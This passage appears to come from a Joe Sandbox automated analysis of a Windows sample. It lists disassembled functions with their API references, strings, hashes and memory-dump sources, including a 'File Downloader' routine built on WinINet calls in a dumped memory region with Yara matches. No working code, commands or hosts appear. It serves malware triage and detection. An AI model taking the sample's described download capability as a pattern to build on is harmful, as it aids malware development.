Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: f2f676a565f09d11e56bcdec2049853dbd75c07a87b5aee6448638d9ac0d1cf9
Instruction ID: 62e5816ec865cd3fbfc7388f5f5531b84f0249a45de01435b12525ca72f8c19c
Opcode Fuzzy Hash: f2f676a565f09d11e56bcdec2049853dbd75c07a87b5aee6448638d9ac0d1cf9
Instruction Fuzzy Hash: C9717B22B09B41CAEB11DFB0D4502ACB7B5EF88749F045035DE8CA7B9ADE38E415C364

Function 0000020933554C60 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000020933554CDD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000020933554D25
Concurrency::cancel_current_task.LIBCPMT ref: 0000020933554EA1
Concurrency::cancel_current_task.LIBCPMT ref: 0000020933554EB4
Concurrency::cancel_current_task.LIBCPMT ref: 0000020933554EBA

Strings

false, xrefs: 0000020933554DAD
true, xrefs: 0000020933554DDC
bad locale name, xrefs: 0000020933554EA7

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: 09b207cdf4242b8e6074482d790a6f56b21befb17ffb41e7395cc2d3da6536f7
Instruction ID: 576622c607e4006b27fcbf89f1fe07cd8175558a72654845b33613643a3b0195
Opcode Fuzzy Hash: 09b207cdf4242b8e6074482d790a6f56b21befb17ffb41e7395cc2d3da6536f7
Instruction Fuzzy Hash: E8718D22782B808AFB05DFB1D4943AC33B6EBC4748F448165AE4E27B9BDB34D491DB45

Function 00007FF6CFA3E230 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 136COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E3F3
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E400

Strings

Can not switch from manual to automatic indexing, xrefs: 00007FF6CFA3E3F9
Invalid format string., xrefs: 00007FF6CFA3E3D2
Number is too big, xrefs: 00007FF6CFA3E3EC
Can not switch from automatic to manual indexing, xrefs: 00007FF6CFA3E3DF

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
API String ID: 909987262-180087107
Opcode ID: 068709c7c03d6538d661d64badbd28962f5457fdc8ef99600b1a680d32a5ac92
Instruction ID: f35819495ac99711a38d3e371fc99b85ba9b14423fe9b31b44906834c191b507
Opcode Fuzzy Hash: 068709c7c03d6538d661d64badbd28962f5457fdc8ef99600b1a680d32a5ac92
Instruction Fuzzy Hash: EF51A122A0C586C6EB158F68D0902FDB361EB91B55F544131E3EEC36E5DE3CE58EC610

Function 00007FF6CFA53EB8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6CFA545C0,?,?,?,?,00007FF6CFA63C82), ref: 00007FF6CFA54034
GetProcAddress.KERNEL32(?,?,?,00007FF6CFA545C0,?,?,?,?,00007FF6CFA63C82), ref: 00007FF6CFA54040

Strings

ext-ms-, xrefs: 00007FF6CFA53F91
api-ms-, xrefs: 00007FF6CFA53F7E

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 1b5fdbe1bb0740eddaadd1b93e53b15a36ff09217fdd149a8004e8997376f726
Instruction ID: be5b939bafed5a26dd0fefda9e11b98b0be57c0cc3cc946da1445832316303c4
Opcode Fuzzy Hash: 1b5fdbe1bb0740eddaadd1b93e53b15a36ff09217fdd149a8004e8997376f726
Instruction Fuzzy Hash: 0341E022B19F02C1FA158F96A810575B3A6BF44BD2F584535ED8EDB784EE3CE40A8330

Function 000002093357BCE4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 000002093357BE60
GetProcAddress.KERNEL32 ref: 000002093357BE6C

Strings

ext-ms-, xrefs: 000002093357BDBD
api-ms-, xrefs: 000002093357BDAA

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: c6120ce6c378417c8061f2daa80316ce8b84504fe2d3d9dfde353b277e126bba
Instruction ID: 8fa54aa1d814e5c87a8f9dca75c7385d4c81a9832b8b1219f0b89b6c113cdb99
Opcode Fuzzy Hash: c6120ce6c378417c8061f2daa80316ce8b84504fe2d3d9dfde353b277e126bba
Instruction Fuzzy Hash: 7A41D3213A1B4086EA19CB16A8CC75533D5B785BE0F49C665FE1F87797EE38C4858B00

Function 0000020933555090 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00000209335550FB
InternetOpenUrlA.WININET ref: 0000020933555130
InternetReadFile.WININET ref: 0000020933555151
InternetReadFile.WININET ref: 000002093355518F
InternetCloseHandle.WININET ref: 000002093355519C
InternetCloseHandle.WININET ref: 00000209335551A5

Strings

File Downloader, xrefs: 00000209335550F4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandleOpenRead
String ID: File Downloader
API String ID: 4038090926-3631955488
Opcode ID: d760029ad861ea7f7ea2ffc299629ee0db5f3c755485599aed123bc73a668a15
Instruction ID: 30518092ff6de093f2e11f59970dd505dac876725d8be44205e103a6f7a2544c
Opcode Fuzzy Hash: d760029ad861ea7f7ea2ffc299629ee0db5f3c755485599aed123bc73a668a15
Instruction Fuzzy Hash: 8F317C32254B8086E7208F25E89879AB7A0F789BC4F448015FE8F47B5ADF78D5858F40

Function 00000209335732AC Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000209335732EF
_invalid_parameter_noinfo.LIBCMT ref: 00000209335736DC
_invalid_parameter_noinfo.LIBCMT ref: 0000020933573978

Strings

f, xrefs: 0000020933573411
p, xrefs: 0000020933573419
p, xrefs: 00000209335733A1

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: da133f4d1d1d50a9f8077a7ed93c78c5851a9c9ee1111e96f3e2a2a160aeb47c
Instruction ID: e5932c1362e5ab7a549ae7d65f0370d586ba00fbd0305806b3678118b8934558
Opcode Fuzzy Hash: da133f4d1d1d50a9f8077a7ed93c78c5851a9c9ee1111e96f3e2a2a160aeb47c
Instruction Fuzzy Hash: EB12CF6265434286FB649F15E09C7AA76A2F3E0774F88C196F69B476C7D738C9C08F80

Function 000002093358ABDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002093358AC0D
GetLastError.KERNEL32 ref: 000002093358AC19
CloseHandle.KERNEL32 ref: 000002093358AC31
CreateFileW.KERNEL32 ref: 000002093358AC5C
WriteConsoleW.KERNEL32 ref: 000002093358AC7B

Strings

CONOUT$, xrefs: 000002093358AC3D

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 97ef1f90b5d1e549fd4d93c948d975b58c02b300c1de8e440893a5efab19f807
Instruction ID: c281507d41b6353a05b84eb6dc3fde827de96daf4ff01395b2e6f9898044ce07
Opcode Fuzzy Hash: 97ef1f90b5d1e549fd4d93c948d975b58c02b300c1de8e440893a5efab19f807
Instruction Fuzzy Hash: 60118231354B8086E7509B56E89931A63A0F7C8FE4F048354FA5E87797CF78C8848B40

Function 000002093359B73C Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 000002093359B7E9
MultiByteToWideChar.KERNEL32 ref: 000002093359B885
MultiByteToWideChar.KERNEL32 ref: 000002093359B92E
MultiByteToWideChar.KERNEL32 ref: 000002093359B958
MultiByteToWideChar.KERNEL32 ref: 000002093359BA00
CompareStringEx.KERNEL32 ref: 000002093359BA4D

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: ab7e75f2883cad40e90fab743296f144bd79ee85a7c99ab5de0f741cdd8f7a66
Instruction ID: c8f5930eb4162b130dbe881948838c0a9591b1fb619403b3b46ad46dc754cfb5
Opcode Fuzzy Hash: ab7e75f2883cad40e90fab743296f144bd79ee85a7c99ab5de0f741cdd8f7a66
Instruction Fuzzy Hash: DFA194727807808AFB218B2594983697A97F7C4BA4F44C695FE5E07BD7DB38C984CB40

Function 000002093359B3DC Relevance: 9.2, APIs: 6, Instructions: 206COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 000002093359B44C
MultiByteToWideChar.KERNEL32 ref: 000002093359B4EA
LCMapStringEx.KERNEL32 ref: 000002093359B553
LCMapStringEx.KERNEL32 ref: 000002093359B5A5
LCMapStringEx.KERNEL32 ref: 000002093359B64A
WideCharToMultiByte.KERNEL32 ref: 000002093359B6A4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: a17d41df7d4fcd83c170866fb1b58b26a6ae7521d63a390143938d7d4d5e554f
Instruction ID: 1bef53cdc4af7162e88e6ca7ec7081a4878df3ad50e5e076a573a1baa949b370
Opcode Fuzzy Hash: a17d41df7d4fcd83c170866fb1b58b26a6ae7521d63a390143938d7d4d5e554f
Instruction Fuzzy Hash: 6481827224178086FF208F25E48875977E6F784BE8F148665FA5E47BDBEB38D4818B40

Function 00000209335703B8 Relevance: 9.2, APIs: 6, Instructions: 157COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093357042A
_invalid_parameter_noinfo.LIBCMT ref: 000002093357045B
_invalid_parameter_noinfo.LIBCMT ref: 000002093357049B
_invalid_parameter_noinfo.LIBCMT ref: 00000209335704DD
_invalid_parameter_noinfo.LIBCMT ref: 0000020933570512
_invalid_parameter_noinfo.LIBCMT ref: 000002093357058F

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ca3f80eaf004f362beb8f5b3b26ae04cc2cf7c865ac26bc256f85fe2d54e20e3
Instruction ID: 3bad65d9c9c12925aec788139560733ded45f5053c3a8f7cb1cd4f31bb77ec6c
Opcode Fuzzy Hash: ca3f80eaf004f362beb8f5b3b26ae04cc2cf7c865ac26bc256f85fe2d54e20e3
Instruction Fuzzy Hash: D55173A714878485E7629F24D0E83AD3BE5A785B84F44D091E7CE4B387DA2DC8C6CB12

Function 00007FF6CFA50B74 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000,00007FF6CFA5BF97,?,?,?), ref: 00007FF6CFA50B83
FlsSetValue.KERNEL32(?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000,00007FF6CFA5BF97,?,?,?), ref: 00007FF6CFA50BB9
FlsSetValue.KERNEL32(?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000,00007FF6CFA5BF97,?,?,?), ref: 00007FF6CFA50BE6
FlsSetValue.KERNEL32(?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000,00007FF6CFA5BF97,?,?,?), ref: 00007FF6CFA50BF7
FlsSetValue.KERNEL32(?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000,00007FF6CFA5BF97,?,?,?), ref: 00007FF6CFA50C08
SetLastError.KERNEL32(?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000,00007FF6CFA5BF97,?,?,?), ref: 00007FF6CFA50C23

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 971659c83b38dd1a66ee83da3a75f24331de4a36c570b19d199c4687843c0274
Instruction ID: c36d25d064c245e194f75237e4ebec2d8aea64b5d81ad207851d61722d3b86f3
Opcode Fuzzy Hash: 971659c83b38dd1a66ee83da3a75f24331de4a36c570b19d199c4687843c0274
Instruction Fuzzy Hash: B8119F20B0CA43C5FA186FB2A99103AB3556F447B6F058B34EDEFC76C6CE2CE4408620

Function 0000020933578374 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000020933578383
FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,00000209335740D5,?,?,?,?,000002093357B584), ref: 00000209335783B9
FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,00000209335740D5,?,?,?,?,000002093357B584), ref: 00000209335783E6
FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,00000209335740D5,?,?,?,?,000002093357B584), ref: 00000209335783F7
FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,00000209335740D5,?,?,?,?,000002093357B584), ref: 0000020933578408
SetLastError.KERNEL32 ref: 0000020933578423

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: afe38cc287240995e2e9d2378547507dd5cbbb9e4fb21f15aad5b3e1c77e3c65
Instruction ID: d8de76c38a63c7f266ad08d9ac4fa5373b4015cbb650e2374e771ca2c468e751
Opcode Fuzzy Hash: afe38cc287240995e2e9d2378547507dd5cbbb9e4fb21f15aad5b3e1c77e3c65
Instruction Fuzzy Hash: C111592028834042FA54A729AADF32D62926BC57F5F14DBE4B93F466D7EE2894C18B40

Function 000002093350DB90 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 281COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 000002093350DBEF

Part of subcall function 0000020933599570: AreFileApisANSI.KERNEL32 ref: 0000020933599582

__std_exception_destroy.LIBVCRUNTIME ref: 000002093350DE97
__std_exception_destroy.LIBVCRUNTIME ref: 000002093350DF51

Strings

", ", xrefs: 000002093350DCDD
: ", xrefs: 000002093350DCAA

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: __std_exception_destroy$ApisFile__std_fs_code_page
String ID: ", "$: "
API String ID: 741338541-747220369
Opcode ID: 254c4e42b6c5ea5b40aec4ef53c617e8b027e819ebb3bcd3ec4b8af68b8df396
Instruction ID: dba165a16a161d34e7a8062dadb108e67fb79c07e5ff4233712ac7194e67702f
Opcode Fuzzy Hash: 254c4e42b6c5ea5b40aec4ef53c617e8b027e819ebb3bcd3ec4b8af68b8df396
Instruction Fuzzy Hash: 38B1BD72741B4096EB00DF25E4883AC23A1E789B88F40C561EE5E4BB9BDF39C4D5C780

Function 00007FF6CFA42C7F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42CAB
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42CB8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA42CF4

Strings

Number is too big., xrefs: 00007FF6CFA42CB1
Negative precision., xrefs: 00007FF6CFA42CA4

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
String ID: Negative precision.$Number is too big.
API String ID: 3237623162-3993994484
Opcode ID: 2e590a375d060733ee75977b5fbcb890a63a34b04a77b8ee94e83729f6395454
Instruction ID: 168291e97055cccd42e9ccf962f3072815280539b7fca07616072ec98f5fec21
Opcode Fuzzy Hash: 2e590a375d060733ee75977b5fbcb890a63a34b04a77b8ee94e83729f6395454
Instruction Fuzzy Hash: B811F1A2C081078FF65A6EB0446A1FAAF90EF61713FE11D34E6EC879A36C5DB5064670

Function 00007FF6CFA42C9E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CFA42D40: std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42D4B

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42CAB
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42CB8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA42CF4

Strings

Number is too big., xrefs: 00007FF6CFA42CB1
Negative precision., xrefs: 00007FF6CFA42CA4

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
String ID: Negative precision.$Number is too big.
API String ID: 3237623162-3993994484
Opcode ID: 30b3e07375628a7fdd50f8a96e8b54408dbdebe0d25ebebc578ccc02e897b34b
Instruction ID: 87c155f839de1fc88cbf5ff05a0429aaec32489c568e778e18c857b10679b9ec
Opcode Fuzzy Hash: 30b3e07375628a7fdd50f8a96e8b54408dbdebe0d25ebebc578ccc02e897b34b
Instruction Fuzzy Hash: A401A5A2C081078FF64A7EB0446E1FAAF90EF61613FE11D34E6D8879A37C1DB5064670

Function 00007FF6CFA42B4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42B7B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42B88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA42BC4

Strings

Number is too big., xrefs: 00007FF6CFA42B81
Negative width., xrefs: 00007FF6CFA42B74

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
String ID: Negative width.$Number is too big.
API String ID: 3237623162-1861685508
Opcode ID: ab522acd4c4287a77fe2f3903c82615eb3740f229d610c7ff32e5c8d09b42faf
Instruction ID: 21f93798727ae7f07ec15ad40adbea0ed36b811977f2384c3cead3e7c90858fe
Opcode Fuzzy Hash: ab522acd4c4287a77fe2f3903c82615eb3740f229d610c7ff32e5c8d09b42faf
Instruction Fuzzy Hash: FD114C2280C2878FE205EFB8841A4BDBFA09F40716F645E35DBE883993DD1DB4908B21

Function 00007FF6CFA42B6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CFA42C10: std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42C1B

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42B7B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42B88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA42BC4

Strings

Number is too big., xrefs: 00007FF6CFA42B81
Negative width., xrefs: 00007FF6CFA42B74

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
String ID: Negative width.$Number is too big.
API String ID: 3237623162-1861685508
Opcode ID: 63d12b850ce4f7623b80e1b60c009f5eeb9bfdff3b4fb586ff0ffa458465622f
Instruction ID: 9e0e1408e073715471e0cd968e19baf73ffe92bffe766b309c92e78ff06098e6
Opcode Fuzzy Hash: 63d12b850ce4f7623b80e1b60c009f5eeb9bfdff3b4fb586ff0ffa458465622f
Instruction Fuzzy Hash: 2D11183280C1878FE205EFB8855A4BEBFA09F40A09B245D35DBD883897ED1DB4908B61

Function 000002093357F4D8 Relevance: 7.7, APIs: 5, Instructions: 196COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002093357F517
_set_statfp.LIBCMT ref: 000002093357F535
_set_statfp.LIBCMT ref: 000002093357F55E
_set_statfp.LIBCMT ref: 000002093357F79A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 5459f65f4676636fdc901623b58b7eba5cdeda63d87ce883b5aed9902fe8fe9f
Instruction ID: 41bff3069d2542007257dfd9d7f49bc7ec6dae16a32cbb682f49a86f95cdc87b
Opcode Fuzzy Hash: 5459f65f4676636fdc901623b58b7eba5cdeda63d87ce883b5aed9902fe8fe9f
Instruction Fuzzy Hash: 5E81C312194B8485F672CF39E4C83AA67A1BBD5798F14C381BE6FA65E7D734C5C18E00

Function 00007FF6CFA50C3C Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

